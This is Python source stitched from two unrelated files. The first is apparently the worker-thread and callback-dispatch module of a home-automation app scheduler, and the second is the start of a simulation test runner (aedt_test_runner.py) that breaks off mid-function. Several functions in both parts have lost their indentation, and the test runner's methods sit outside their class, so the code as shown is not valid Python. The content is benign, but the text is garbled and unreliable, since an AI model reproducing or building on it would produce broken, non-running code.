        """Pick a worker thread for a callback and enqueue it.

        Pinned apps go to their pinned thread; unpinned callbacks are spread
        across the unpinned thread range per self.AD.load_distribution.
        """
        #
        # Select Q based on distribution method:
        #   Round Robin
        #   Random
        #   Load distribution
        #
        # Check for pinned app and if so figure correct thread for app
        if args["pin_app"] is True:
            thread = args["pin_thread"]
            # Handle the case where an App is unpinned but selects a pinned callback without specifying a thread
            # If this happens a lot, thread 0 might get congested but the alternatives are worse!
            if thread == -1:
                self.logger.warning("Invalid thread ID for pinned thread in app: %s - assigning to thread 0", args["name"])
                thread = 0
        else:
            # No unpinned threads exist to receive this callback.
            if self.thread_count == self.pin_threads:
                raise ValueError("pin_threads must be set lower than threads if unpinned_apps are in use")
            if self.AD.load_distribution == "load":
                thread = self.min_q_id()
            elif self.AD.load_distribution == "random":
                thread = randint(self.pin_threads, self.thread_count - 1)
            else:
                # Round Robin is the catch all
                thread = self.next_thread
                self.next_thread += 1
                if self.next_thread == self.thread_count:
                    self.next_thread = self.pin_threads
        if thread < 0 or thread >= self.thread_count:
            raise ValueError("invalid thread id: {} in app {}".format(thread, args["name"]))
        id = "thread-{}".format(thread)
        q = self.threads[id]["queue"]
        q.put_nowait(args)
async def check_overdue_and_dead_threads(self):
if self.AD.sched.realtime is True and self.AD.thread_duration_warning_threshold != 0:
for thread_id in self.threads:
if self.threads[thread_id]["thread"].isAlive() is not True:
self.logger.critical("Thread %s has died", thread_id)
self.logger.critical("Pinned apps were: %s", await self.get_pinned_apps(thread_id))
self.logger.critical("Thread will be restarted")
id=thread_id.split("-")[1]
await self.add_thread(silent=False, pinthread=False, id=id)
if await self.get_state("_threading", "admin", "thread.{}".format(thread_id)) != "idle":
start = utils.str_to_dt(await self.get_state("_threading", "admin", "thread.{}".format(thread_id), attribute="time_called"))
dur = (await self.AD.sched.get_now() - start).total_seconds()
if dur >= self.AD.thread_duration_warning_threshold and dur % self.AD.thread_duration_warning_threshold == 0:
self.logger.warning("Excessive time spent in callback: %s - %s",
await self.get_state("_threading", "admin", "thread.{}".format(thread_id),
attribute="callback")
, dur)
    async def check_q_size(self, warning_step, warning_iterations):
        """Warn (with stepped backoff) when total queue size suggests thread starvation.

        Returns the updated (warning_step, warning_iterations) pair for the
        caller to feed back in on the next check.
        """
        if self.total_q_size() > self.AD.qsize_warning_threshold:
            # Log (and dump full diagnostics) only at the configured intervals.
            if (warning_step == 0 and warning_iterations >= self.AD.qsize_warning_iterations) or warning_iterations == self.AD.qsize_warning_iterations:
                self.logger.warning("Queue size is %s, suspect thread starvation", self.total_q_size())
                await self.dump_threads()
                warning_step = 0
            warning_step += 1
            warning_iterations += 1
            if warning_step >= self.AD.qsize_warning_step:
                warning_step = 0
        else:
            # Queue has drained - reset the backoff counters.
            warning_step = 0
            warning_iterations = 0
        return warning_step, warning_iterations
    async def update_thread_info(self, thread_id, callback, app, type, uuid):
        """Record callback start/finish against the thread and app admin entities.

        *callback* is either a description of the running callback or the
        literal string "idle" to mark completion.
        """
        self.logger.debug("Update thread info: %s", thread_id)
        if self.AD.log_thread_actions:
            if callback == "idle":
                self.diag.info(
                    "%s done", thread_id)
            else:
                self.diag.info(
                    "%s calling %s callback %s", thread_id, type, callback)
        now = await self.AD.sched.get_now()
        if callback == "idle":
            # Callback finished: check its duration, decrement the busy count,
            # and bump the executed statistics.
            start = utils.str_to_dt(await self.get_state("_threading", "admin", "thread.{}".format(thread_id), attribute="time_called"))
            if self.AD.sched.realtime is True and (now - start).total_seconds() >= self.AD.thread_duration_warning_threshold:
                self.logger.warning("callback %s has now completed", await self.get_state("_threading", "admin", "thread.{}".format(thread_id)))
            await self.add_to_state("_threading", "admin", "sensor.threads_current_busy", -1)
            await self.add_to_attr("_threading", "admin", "app.{}".format(app), "callbacks", 1)
            await self.add_to_attr("_threading", "admin", "{}_callback.{}".format(type, uuid), "executed", 1)
            await self.add_to_state("_threading", "admin", "sensor.callbacks_total_executed", 1)
            self.current_callbacks_executed += 1
        else:
            # Callback starting: increment the busy count and fired statistics.
            await self.add_to_state("_threading", "admin", "sensor.threads_current_busy", 1)
            self.current_callbacks_fired += 1
        current_busy = await self.get_state("_threading", "admin", "sensor.threads_current_busy")
        max_busy = await self.get_state("_threading", "admin", "sensor.threads_max_busy")
        if current_busy > max_busy:
            # New high-water mark for concurrently busy threads.
            await self.set_state("_threading", "admin", "sensor.threads_max_busy" , state=current_busy)
            await self.set_state("_threading", "admin", "sensor.threads_max_busy_time", state=utils.dt_to_str((await self.AD.sched.get_now()).replace(microsecond=0), self.AD.tz))
        await self.set_state("_threading", "admin", "sensor.threads_last_action_time", state=utils.dt_to_str((await self.AD.sched.get_now()).replace(microsecond=0), self.AD.tz))
        # Update thread info
        await self.set_state("_threading", "admin", "thread.{}".format(thread_id),
            q=self.threads[thread_id]["queue"].qsize(),
            state=callback,
            time_called=utils.dt_to_str(now.replace(microsecond=0), self.AD.tz),
            is_alive = self.threads[thread_id]["thread"].is_alive(),
            pinned_apps=await self.get_pinned_apps(thread_id)
            )
        await self.set_state("_threading", "admin", "app.{}".format(app), state=callback)
#
# Pinning
#
async def add_thread(self, silent=False, pinthread=False, id=None):
if id is None:
tid = self.thread_count
else:
tid = id
if silent is False:
self.logger.info("Adding thread %s", tid)
t = threading.Thread(target=self.worker)
t.daemon = True
name = "thread-{}".format(tid)
t.setName(name)
if id is None:
await self.add_entity("admin", "thread.{}".format(name), "idle",
{
"q": 0,
"is_alive": True,
"time_called": utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)),
}
)
self.threads[name] = {}
self.threads[name]["queue"] = Queue(maxsize=0)
t.start()
self.thread_count += 1
if pinthread is True:
self.pin_threads += 1
else:
await self.set_state("_threading", "admin", "thread.{}".format(name), state="idle", is_alive=True)
self.threads[name]["thread"] = t
    async def calculate_pin_threads(self):
        """Assign every pinned app a pin thread, balancing by per-thread pin count."""
        if self.pin_threads == 0:
            return
        # thread_pins[i] counts apps pinned to pin thread i.
        thread_pins = [0] * self.pin_threads
        for name in self.AD.app_management.objects:
            # Looking for apps that already have a thread pin value
            if await self.get_app_pin(name) and await self.get_pin_thread(name) != -1:
                thread = await self.get_pin_thread(name)
                if thread >= self.thread_count:
                    raise ValueError("Pinned thread out of range - check apps.yaml for 'pin_thread' or app code for 'set_pin_thread()'")
                # Ignore anything outside the pin range as it will have been set by the user
                if thread < self.pin_threads:
                    thread_pins[thread] += 1
        # Now we know the numbers, go fill in the gaps
        for name in self.AD.app_management.objects:
            if await self.get_app_pin(name) and await self.get_pin_thread(name) == -1:
                # Give the unassigned app the least-loaded pin thread.
                thread = thread_pins.index(min(thread_pins))
                await self.set_pin_thread(name, thread)
                thread_pins[thread] += 1
        # Publish the final pin map on each thread's admin entity.
        for thread in self.threads:
            pinned_apps = await self.get_pinned_apps(thread)
            await self.set_state("_threading", "admin", "thread.{}".format(thread), pinned_apps=pinned_apps)
def app_should_be_pinned(self, name):
# Check apps.yaml first - allow override
app = self.AD.app_management.app_config[name]
if "pin_app" in app:
return app["pin_app"]
# if not, go with the global default
return self.pin_apps
async def get_app_pin(self, name):
return self.AD.app_management.objects[name]["pin_app"]
async def set_app_pin(self, name, pin):
self.AD.app_management.objects[name]["pin_app"] = pin
if pin is True:
# May need to set this app up with a pinned thread
await self.calculate_pin_threads()
async def get_pin_thread(self, name):
return self.AD.app_management.objects[name]["pin_thread"]
async def set_pin_thread(self, name, thread):
self.AD.app_management.objects[name]["pin_thread"] = thread
def validate_pin(self, name, kwargs):
if "pin_thread" in kwargs:
if kwargs["pin_thread"] < 0 or kwargs["pin_thread"] >= self.thread_count:
self.logger.warning("Invalid value for pin_thread (%s) in app: %s - discarding callback", kwargs["pin_thread"], name)
return False
else:
return True
async def get_pinned_apps(self, thread):
id = int(thread.split("-")[1])
apps = []
for obj in self.AD.app_management.objects:
if self.AD.app_management.objects[obj]["pin_thread"] == id:
apps.append(obj)
return apps
#
# Constraints
#
async def check_constraint(self, key, value, app):
unconstrained = True
if key in app.list_constraints():
method = getattr(app, key)
unconstrained = await utils.run_in_executor(self, method, value)
return unconstrained
async def check_time_constraint(self, args, name):
unconstrained = True
if "constrain_start_time" in args or "constrain_end_time" in args:
if "constrain_start_time" not in args:
start_time = "00:00:00"
else:
start_time = args["constrain_start_time"]
if "constrain_end_time" not in args:
end_time = "23:59:59"
else:
end_time = args["constrain_end_time"]
if await self.AD.sched.now_is_between(start_time, end_time, name) is False:
unconstrained = False
return unconstrained
#
# Workers
#
    async def check_and_dispatch_state(self, name, funcref, entity, attribute, new_state,
                                       old_state, cold, cnew, kwargs, uuid_, pin_app, pin_thread):
        """Decide whether a state change should fire a state callback, and dispatch it.

        Handles attribute == "all" (raw old/new state passed through),
        per-attribute extraction, old/new value constraints (cold/cnew), and
        the optional "duration" kwarg which defers the callback via a
        scheduler timer. Returns True when a callback was dispatched.
        """
        executed = False
        #kwargs["handle"] = uuid_
        if attribute == "all":
            executed = await self.dispatch_worker(name, {
                "id": uuid_,
                "name": name,
                "objectid": self.AD.app_management.objects[name]["id"],
                "type": "state",
                "function": funcref,
                "attribute": attribute,
                "entity": entity,
                "new_state": new_state,
                "old_state": old_state,
                "pin_app": pin_app,
                "pin_thread": pin_thread,
                "kwargs": kwargs,
            })
        else:
            # Pull the watched attribute out of the old/new state dicts; it may
            # live at the top level or nested under "attributes".
            if old_state is None:
                old = None
            else:
                if attribute in old_state:
                    old = old_state[attribute]
                elif 'attributes' in old_state and attribute in old_state['attributes']:
                    old = old_state['attributes'][attribute]
                else:
                    old = None
            if new_state is None:
                new = None
            else:
                if attribute in new_state:
                    new = new_state[attribute]
                elif 'attributes' in new_state and attribute in new_state['attributes']:
                    new = new_state['attributes'][attribute]
                else:
                    new = None
            # Fire only when the value changed and matches any old/new value
            # constraints the subscriber supplied.
            if (cold is None or cold == old) and (cnew is None or cnew == new) and new != old:
                if "duration" in kwargs:
                    # Set a timer
                    exec_time = await self.AD.sched.get_now() + timedelta(seconds=int(kwargs["duration"]))
                    kwargs["__duration"] = await self.AD.sched.insert_schedule(
                        name, exec_time, funcref, False, None,
                        __entity=entity,
                        __attribute=attribute,
                        __old_state=old,
                        __new_state=new, **kwargs
                    )
                else:
                    # Do it now
                    executed = await self.dispatch_worker(name, {
                        "id": uuid_,
                        "name": name,
                        "objectid": self.AD.app_management.objects[name]["id"],
                        "type": "state",
                        "function": funcref,
                        "attribute": attribute,
                        "entity": entity,
                        "new_state": new,
                        "old_state": old,
                        "pin_app": pin_app,
                        "pin_thread": pin_thread,
                        "kwargs": kwargs
                    })
            else:
                if "__duration" in kwargs and new != old:
                    # cancel timer
                    await self.AD.sched.cancel_timer(name, kwargs["__duration"])
        return executed
async def dispatch_worker(self, name, args):
    """Apply app-level and callback-level constraints, then queue the callback.

    Returns True when the callback passed every constraint and was queued,
    False when any constraint suppressed it.
    """
    app_object = self.AD.app_management.objects[name]["object"]
    app_config = self.AD.app_management.app_config[name]

    # App-level argument constraints. Every configured arg is evaluated even
    # after the first failure, preserving the original evaluation order.
    unconstrained = True
    for arg_name in app_config.keys():
        if not await self.check_constraint(arg_name, app_config[arg_name], app_object):
            unconstrained = False
    if not await self.check_time_constraint(app_config, name):
        unconstrained = False

    # Callback-level constraints supplied via the callback's kwargs.
    myargs = utils.deepcopy(args)
    if "kwargs" in myargs:
        callback_kwargs = myargs["kwargs"]
        for arg_name in callback_kwargs.keys():
            if not await self.check_constraint(arg_name, callback_kwargs[arg_name], app_object):
                unconstrained = False
        if not await self.check_time_constraint(callback_kwargs, name):
            unconstrained = False

    if not unconstrained:
        return False

    # It's going to happen: record dispatch statistics, then queue the job.
    await self.add_to_state("_threading", "admin", "sensor.callbacks_total_fired", 1)
    await self.add_to_attr("_threading", "admin", "{}_callback.{}".format(myargs["type"], myargs["id"]), "fired", 1)
    self.select_q(myargs)
    return True
# noinspection PyBroadException
def worker(self):
    """Thread main loop: pull dispatched callbacks off this thread's queue and run them.

    Runs forever, taking one job dict per iteration, validating the callback's
    signature for its type ("scheduler" / "state" / "event"), updating thread
    bookkeeping, and invoking the callback synchronously.  Errors inside a
    callback are logged to the app's error logger; the loop never dies.
    """
    thread_id = threading.current_thread().name
    q = self.get_q(thread_id)
    while True:
        args = q.get()
        _type = args["type"]
        funcref = args["function"]
        _id = args["id"]
        objectid = args["objectid"]
        name = args["name"]
        error_logger = logging.getLogger("Error.{}".format(name))
        args["kwargs"]["__thread_id"] = thread_id
        callback = "{}() in {}".format(funcref.__name__, name)
        app = utils.run_coroutine_threadsafe(self, self.AD.app_management.get_app_instance(name, objectid))
        if app is not None:
            try:
                if _type == "scheduler":
                    if self.validate_callback_sig(name, "scheduler", funcref):
                        utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
                        funcref(self.AD.sched.sanitize_timer_kwargs(app, args["kwargs"]))
                elif _type == "state":
                    if self.validate_callback_sig(name, "state", funcref):
                        entity = args["entity"]
                        attr = args["attribute"]
                        old_state = args["old_state"]
                        new_state = args["new_state"]
                        utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
                        funcref(entity, attr, old_state, new_state,
                                self.AD.state.sanitize_state_kwargs(app, args["kwargs"]))
                elif _type == "event":
                    data = args["data"]
                    if args["event"] == "__AD_LOG_EVENT":
                        if self.validate_callback_sig(name, "log_event", funcref):
                            utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
                            funcref(data["app_name"], data["ts"], data["level"], data["type"], data["message"], args["kwargs"])
                    else:
                        if self.validate_callback_sig(name, "event", funcref):
                            utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
                            funcref(args["event"], data, args["kwargs"])
            except Exception:
                # FIX: was a bare `except:`, which also swallowed SystemExit /
                # KeyboardInterrupt; Exception still catches all callback errors.
                error_logger.warning('-' * 60)
                error_logger.warning("Unexpected error in worker for App %s:", name)
                # FIX: message typo "Worker Ags" -> "Worker Args".
                error_logger.warning("Worker Args: %s", args)
                error_logger.warning('-' * 60)
                error_logger.warning(traceback.format_exc())
                error_logger.warning('-' * 60)
                if self.AD.logging.separate_error_log() is True:
                    self.logger.warning("Logged an error to %s", self.AD.logging.get_filename("error_log"))
            finally:
                # Mark the thread idle whether the callback succeeded or not.
                utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, "idle", name, _type, _id))
        else:
            if not self.AD.stopping:
                self.logger.warning("Found stale callback for %s - discarding", name)
        q.task_done()
def validate_callback_sig(self, name, type, funcref):
    """Check that *funcref* accepts the argument count its callback type requires.

    Returns True when the signature matches, False (with a warning/error
    logged) when the count is wrong or the type is unknown.
    """
    # Expected (parameter count, human-readable signature) per callback type.
    expected = {
        "scheduler": (1, "f(self, kwargs)"),
        "state": (5, "f(self, entity, attribute, old, new, kwargs)"),
        "event": (3, "f(self, event, data, kwargs)"),
        "log_event": (6, "f(self, name, ts, level, type, message, kwargs)"),
        "initialize": (0, "initialize()"),
    }
    if type not in expected:
        self.logger.error("Unknown callback type: %s", type)
        return False
    count, signature = expected[type]
    if len(inspect.signature(funcref).parameters) == count:
        return True
    self.logger.warning(
        "Incorrect signature type for callback %s(), should be %s - discarding",
        funcref.__name__,
        signature,
    )
    return False
|
aedt_test_runner.py | import argparse
import datetime
import json
import os
import platform
import re
import subprocess
import tempfile
import threading
from contextlib import contextmanager
from distutils.dir_util import copy_tree
from distutils.dir_util import mkpath
from distutils.dir_util import remove_tree
from distutils.file_util import copy_file
from pathlib import Path
from time import sleep
from typing import Any
from typing import Dict
from typing import Iterable
from typing import Iterator
from typing import List
from typing import Optional
from typing import Tuple
from typing import Union
import tomli
from django import setup as django_setup
from django.conf import settings as django_settings
from django.template.loader import get_template
from aedttest.clusters.job_hosts import get_job_machines
from aedttest.logger import logger
from aedttest.logger import set_logger
from pyaedt import __file__ as _py_aedt_path # isort: skip
# Key filesystem locations, resolved once at import time.
MODULE_DIR = Path(__file__).resolve().parent
CWD_DIR = Path.cwd()
LOGFOLDER_PATH = CWD_DIR / "logs"
LOGFILE_PATH = LOGFOLDER_PATH / "aedt_test_framework.log"
# configure Django templates
django_settings.configure(
    TEMPLATES=[
        {
            "BACKEND": "django.template.backends.django.DjangoTemplates",
            "DIRS": [MODULE_DIR / "static" / "templates"],  # if you want the templates from a file
        },
    ]
)
django_setup()
# Pre-load the two report templates used by the render_* methods below.
MAIN_PAGE_TEMPLATE = get_template("main.html")
PROJECT_PAGE_TEMPLATE = get_template("project-report.html")
def main() -> None:
    """CLI entry point: parse arguments, build the tester and launch the run."""
    try:
        cli_args = parse_arguments()
    except ValueError as exc:
        # Argument validation failed: report and exit with non-zero status.
        logger.error(str(exc))
        raise SystemExit(1)
    try:
        tester = ElectronicsDesktopTester(
            version=cli_args.aedt_version,
            max_cores=cli_args.max_cores,
            max_parallel_projects=cli_args.max_projects,
            config_folder=cli_args.config_folder,
            out_dir=cli_args.out_dir,
            save_projects=cli_args.save_sim_data,
            only_reference=cli_args.only_reference,
            reference_folder=cli_args.reference_folder,
        )
        if not cli_args.suppress_validation:
            tester.validate_config()
            if cli_args.only_validate:
                return
        tester.run()
    except Exception as exc:
        # Log with traceback, then let the exception propagate to the caller.
        logger.exception(str(exc))
        raise
class ElectronicsDesktopTester:
def __init__(
    self,
    version: str,
    max_cores: int,
    max_parallel_projects: int,
    config_folder: Path,
    out_dir: Optional[str],
    save_projects: Optional[bool],
    only_reference: Optional[bool],
    reference_folder: Optional[Path],
) -> None:
    """Set up paths, load reference results and read project configurations.

    NOTE(review): this constructor performs filesystem I/O (reads reference
    JSON files and .toml configs) and queries the job scheduler for machines.
    """
    logger.info(f"Initialize new Electronics Desktop Test run. Configuration folder is {config_folder}")
    self.version = version
    # max_cores is stored but not referenced in this chunk — verify usage elsewhere.
    self.max_cores = max_cores
    self.max_parallel_projects = max_parallel_projects
    self.active_tasks = 0  # count of currently running project threads
    self.out_dir = Path(out_dir) if out_dir else CWD_DIR
    self.results_path = self.out_dir / f"results_{time_now(posix=True)}"
    self.reference_folder = self.results_path / "reference_folder"
    # When simulation data is kept, projects run under out_dir; otherwise
    # they live (and die) with the results folder.
    self.proj_dir = self.out_dir if save_projects else self.results_path
    self.keep_sim_data = bool(save_projects)
    self.only_reference = only_reference
    # Reference results keyed by project name, loaded only for compare runs.
    self.reference_data = {}
    if not only_reference and reference_folder is not None:
        for ref in reference_folder.rglob("*.json"):
            with open(ref) as file:
                data = json.load(file)
                self.reference_data[data["name"]] = data
    self.script = str(MODULE_DIR / "simulation_data.py")
    # logfile path will be appended dynamically later
    self.script_args = f"\"--pyaedt-path='{Path(_py_aedt_path).parent.parent}' --logfile-path='{{}}'\""
    self.report_data: Dict[str, Any] = {}
    # hostname -> free core count for every machine granted by the scheduler
    self.machines_dict = {machine.hostname: machine.cores for machine in get_job_machines()}
    self.project_tests_config = read_configs(config_folder)
def validate_config(self) -> None:
    """Make quick validation of --config-folder [and --reference-file if present].

    Verifies each project's distribution settings and, when comparing against
    reference results, that the project sets match in both directions.
    Raises KeyError on the first inconsistency found.
    """
    for project_name, config in self.project_tests_config.items():
        dist = config["distribution"]
        if "parametric_tasks" not in dist:
            continue
        tasks = dist["parametric_tasks"]
        cores = dist["cores"]
        if not isinstance(tasks, int):
            raise KeyError("'parametric_tasks' key must be integer")
        if tasks < 1:
            raise KeyError("'parametric_tasks' key must be >= 1")
        if tasks > cores:
            # implicitly checks that cores >= 1
            raise KeyError("'parametric_tasks' key must be <= 'cores'")
        if cores % tasks != 0:
            raise KeyError("'cores' divided by 'parametric_tasks' must be integer")
    if not self.only_reference:
        # Project sets must match in both directions between reference and config.
        checks = (
            (set(self.reference_data) - set(self.project_tests_config),
             "reference results", ", but not specified in current configuration file"),
            (set(self.project_tests_config) - set(self.reference_data),
             "configuration file", ", but not found in reference results file"),
        )
        for missing, origin, suffix in checks:
            if missing:
                raise KeyError(f"Following projects defined in {origin}: {', '.join(list(missing))}{suffix}")
    logger.info("Configuration validation is successful")
def run(self) -> None:
    """Main function to start test suite.

    Validates hardware, seeds the report, then launches one daemon thread per
    project as the allocator grants resources.  All threads are joined inside
    the temp-dir context so simulation data is not deleted while jobs run.
    """
    self.validate_hardware()
    self.initialize_results()
    threads_list = []
    with mkdtemp_persistent(persistent=self.keep_sim_data, dir=self.proj_dir, prefix=f"{self.version}_") as tmp_dir:
        # allocator() blocks until cores are free, yielding one project at a time.
        for project_name, allocated_machines in self.allocator():
            project_config = self.project_tests_config[project_name]
            logger.info(f"Start project {project_name}")
            copy_dependencies(project_config, tmp_dir)
            project_path = copy_proj(project_config, tmp_dir)
            thread_kwargs = {
                "project_path": project_path,
                "allocated_machines": allocated_machines,
                "project_config": project_config,
                "project_name": project_name,
            }
            thread = threading.Thread(target=self.task_runner, daemon=True, kwargs=thread_kwargs)
            thread.start()
            threads_list.append(thread)
        for th in threads_list:
            # wait for all threads to finish before delete folder
            th.join()
    self.render_main_html(finished=True)  # make thread-safe render
    msg = (
        f"Job is completed.\nReference result folder is stored under {self.reference_folder}"
        f"\nYou can view report by opening in web browser: {self.results_path / 'main.html'}"
    )
    logger.info(msg)
def validate_hardware(self) -> None:
    """Validate that the machine pool can satisfy every requested configuration.

    Raises ValueError for the first project whose core request exceeds the
    pool total, or the largest single machine when 'single_node' is set.
    """
    cores_per_machine = list(self.machines_dict.values())
    total_cores = sum(cores_per_machine)
    biggest_machine = max(cores_per_machine)
    for proj, conf in self.project_tests_config.items():
        required = conf["distribution"]["cores"]
        # single_node is only consulted when the total-pool check passes,
        # matching the original short-circuit behavior.
        if required > total_cores or (
            conf["distribution"]["single_node"] and required > biggest_machine
        ):
            raise ValueError(f"{proj} requires {required} cores. Not enough resources to run")
def initialize_results(self) -> None:
    """Copy static web assets (CSS, JS) and seed ``self.report_data``.

    Every project starts as 'queued' with no link; delta starts at 0 for
    comparison runs (so the page renders an integer) or None otherwise.
    """
    if self.results_path.exists():
        remove_tree(str(self.results_path))
    static_dir = MODULE_DIR / "static"
    for asset in ("css", "js"):
        copy_path_to(str(static_dir / asset), str(self.results_path))
    self.reference_folder.mkdir()
    self.report_data["all_delta"] = None if self.only_reference else 1
    projects: Dict[str, Any] = {}
    for project_name, project_config in self.project_tests_config.items():
        projects[project_name] = {
            "cores": project_config["distribution"]["cores"],
            "status": "queued",
            "link": None,
            # integer delta only when a reference comparison will happen
            "delta": None if self.only_reference else 0,
            "time": time_now(),
        }
    self.report_data["projects"] = projects
    self.render_main_html()
def render_main_html(self, finished: bool = False) -> None:
    """Render the top-level report page from ``self.report_data``.

    Parameters
    ----------
    finished : bool, default=False
        When True the rendered page stops auto-refreshing.
    """
    context = {
        "projects": self.report_data["projects"],
        "finished": finished,
        "all_delta": self.report_data["all_delta"],
        "has_reference": not self.only_reference,
    }
    html = MAIN_PAGE_TEMPLATE.render(context=context)
    with open(self.results_path / "main.html", "w") as out_file:
        out_file.write(html)
def render_project_html(self, project_name: str, project_report: Dict[str, Union[List[Any], int]]) -> None:
    """Render (or re-render) one project's report page.

    Parameters
    ----------
    project_name : str
        Name of the project to render.
    project_report : dict
        Plot/mesh/time data plus collected errors to show on the page.
    """
    page_ctx = {
        "plots": project_report["plots"],
        "project_name": project_name,
        "errors": project_report["error_exception"],
        "mesh": project_report["mesh"],
        "sim_time": project_report["simulation_time"],
        "slider_limit": project_report["slider_limit"],
        "has_reference": not self.only_reference,
    }
    html = PROJECT_PAGE_TEMPLATE.render(context=page_ctx)
    with open(self.results_path / f"{project_name}.html", "w") as out_file:
        out_file.write(html)
def task_runner(
    self, project_name: str, project_path: str, project_config: Dict[str, Any], allocated_machines: Dict[str, Any]
) -> None:
    """Per-thread task runner: run one project in AEDT and publish its report.

    Mutates ``self.report_data["projects"]`` and ``self.machines_dict``.
    Cores are returned to the pool in the ``finally`` block regardless of how
    AEDT exits, and any OSError from the launch is prepended to the report's
    error list.

    Parameters
    ----------
    project_name : str
        Name of the project to start.
    project_path : str
        Path to the project.
    project_config : dict
        Configuration of project, distribution, etc.
    allocated_machines : dict
        Machines and cores that were allocated for this task.
    """
    self.report_data["projects"][project_name]["time"] = time_now()
    self.report_data["projects"][project_name]["status"] = "running"
    self.render_main_html()
    log_file = LOGFOLDER_PATH / f"framework_{project_name}.log"
    errors = None
    try:
        execute_aedt(
            self.version,
            allocated_machines,
            distribution_config=project_config["distribution"],
            script=self.script,
            script_args=self.script_args.format(log_file),
            project_path=project_path,
        )
        logger.debug(f"Project {project_name} analyses finished. Prepare report.")
    except OSError as exc:
        # Launch/run failure is recorded, not fatal — report is still built.
        errors = str(exc)
    finally:
        # return cores back
        for machine in allocated_machines:
            self.machines_dict[machine] += allocated_machines[machine]["cores"]
    project_report = self.prepare_project_report(project_name, project_path)
    if errors:
        project_report["error_exception"].insert(0, errors)  # type: ignore[union-attr]
    self.render_project_html(project_name, project_report)
    status = "success" if not project_report["error_exception"] else "fail"
    self.report_data["projects"][project_name].update(
        {
            "link": f"{project_name}.html",
            "delta": project_report["slider_limit"],
            "time": time_now(),
            "status": status,
        }
    )
    self.render_main_html()
    # Free a slot so the allocator can start the next queued project.
    self.active_tasks -= 1
def prepare_project_report(self, project_name: str, project_path: str) -> Dict[str, Union[List[Any], int]]:
    """Prepare project report dictionary that is required by ``render_project_html()``.

    Loads the project's result JSON, always writes a copy to the reference
    folder, then extracts mesh, simulation-time and XY-curve data.  All
    extraction failures are collected in ``error_exception`` rather than
    raised.

    Parameters
    ----------
    project_name : str
        Name of the project.
    project_path : str
        Path to the project.

    Returns
    -------
    project_report : dict
        project report dictionary that is required by ``render_project_html()``.
    """
    report_file = Path(project_path).parent / f"{project_name}.json"
    project_report: Dict[str, Union[List[Any], Any]] = {
        "plots": [],
        "error_exception": [],
        "mesh": [],
        "simulation_time": [],
        "slider_limit": 0,
    }
    project_data = self.check_all_results_present(project_report["error_exception"], report_file, project_name)
    project_data["aedt_version"] = self.version
    project_data["name"] = project_name
    # The reference copy is written even when the run had errors.
    with open(self.reference_folder / f"ref_{project_name}.json", "w") as file:
        json.dump(project_data, file, indent=4)
    # Any error collected so far means keys are missing from the result data.
    keys_missing = bool(project_report["error_exception"])
    try:
        # NOTE: raises KeyError when project_data is empty — caught below.
        project_report["error_exception"] += project_data["error_exception"]
        if keys_missing:
            # cannot do extraction if some keys are missing
            return project_report
        for design_name, design_data in project_data["designs"].items():
            # get mesh data
            self.extract_mesh_or_time_data("mesh", design_data, design_name, project_name, project_report)
            # get simulation time
            self.extract_mesh_or_time_data(
                "simulation_time", design_data, design_name, project_name, project_report
            )
            # extract XY curve data
            self.extract_curve_data(design_data, design_name, project_name, project_report)
    except Exception as exc:
        project_report["error_exception"].append(str(exc))
    return project_report
def check_all_results_present(
    self, project_exceptions: List[str], report_file: Path, project_name: str
) -> Dict[str, Any]:
    """Load the project's result JSON and cross-check it against reference data.

    Appends a message to ``project_exceptions`` when the report file or the
    reference entry is missing, and records any key mismatch between the two
    design trees (in both directions).

    Parameters
    ----------
    project_exceptions : list
        List to append with errors.
    report_file : Path
        JSON file path with results.
    project_name : str
        Name of the project.

    Returns
    -------
    project_data : dict
        Dictionary loaded from the .json file (empty when the file is absent).
    """
    project_data: Dict[str, Any] = {}
    if not report_file.exists():
        project_exceptions.append(f"Project report for {project_name} does not exist")
        return project_data
    with open(report_file) as file:
        project_data = json.load(file)
    if self.only_reference:
        return project_data
    if project_name not in self.reference_data:
        project_exceptions.append(f"Project report for {project_name} does not exist in reference file")
        return project_data
    # Compare design keys both ways so additions and removals are both caught.
    reference_designs = self.reference_data[project_name]["designs"]
    current_designs = project_data["designs"]
    for first, second, results_type in (
        (reference_designs, current_designs, "current"),
        (current_designs, reference_designs, "reference"),
    ):
        compare_keys(first, second, exceptions_list=project_exceptions, results_type=results_type)
    return project_data
def extract_curve_data(
    self,
    design_data: Dict[str, Any],
    design_name: str,
    project_name: str,
    project_report: Dict[str, Union[List[Any], Any]],
) -> None:
    """Extract all XY curves for a particular design.

    Mutates ``project_report``: appends one plot dict per curve and, when a
    reference exists, fills in the point-wise difference and the maximum
    relative delta (percent), widening ``slider_limit`` accordingly.

    Parameters
    ----------
    design_data : dict
        All the data related to a single design in project_name.
    design_name : str
        Name of the design.
    project_name : str
        Name of the project.
    project_report : dict
        Project report dictionary that is required by 'render_project_html()'.
    """
    for report_name, report_data in design_data["report"].items():
        for trace_name, trace_data in report_data.items():
            for curve_name, curve_data in trace_data["curves"].items():
                plot_data = {
                    "name": f"{design_name}:{report_name}:{trace_name}:{curve_name}",
                    "id": unique_id(),
                    "x_label": f'"{trace_data["x_name"]} [{trace_data["x_unit"]}]"',
                    "y_label": f'"[{trace_data["y_unit"]}]"',
                    "x_axis": curve_data["x_data"],
                    # Placeholders; overwritten below when reference data exists.
                    "version_ref": -1,
                    "y_axis_ref": [],
                    "version_now": str(self.version),
                    "y_axis_now": curve_data["y_data"],
                    "diff": [],
                    "delta": -1,
                }
                if not self.only_reference:
                    y_ref_data = self.reference_data[project_name]["designs"][design_name]["report"][report_name][
                        trace_name
                    ]["curves"][curve_name]["y_data"]
                    if len(y_ref_data) != len(curve_data["y_data"]):
                        # Point count mismatch: record the error and drop this plot.
                        msg = (
                            f"Number of trace points in reference data [{len(y_ref_data)}] isn't equal to "
                            f"number in current data [{len(curve_data['y_data'])}]"
                        )
                        project_report["error_exception"].append(msg)
                        continue
                    max_delta = 0
                    difference = []
                    for ref, actual in zip(y_ref_data, curve_data["y_data"]):
                        difference.append(ref - actual)
                        if actual != 0:
                            # if 0, just skip, no sense for 'infinite' delta
                            max_delta = max(max_delta, abs(1 - ref / actual))
                    max_delta_perc = round(max_delta * 100, 3)
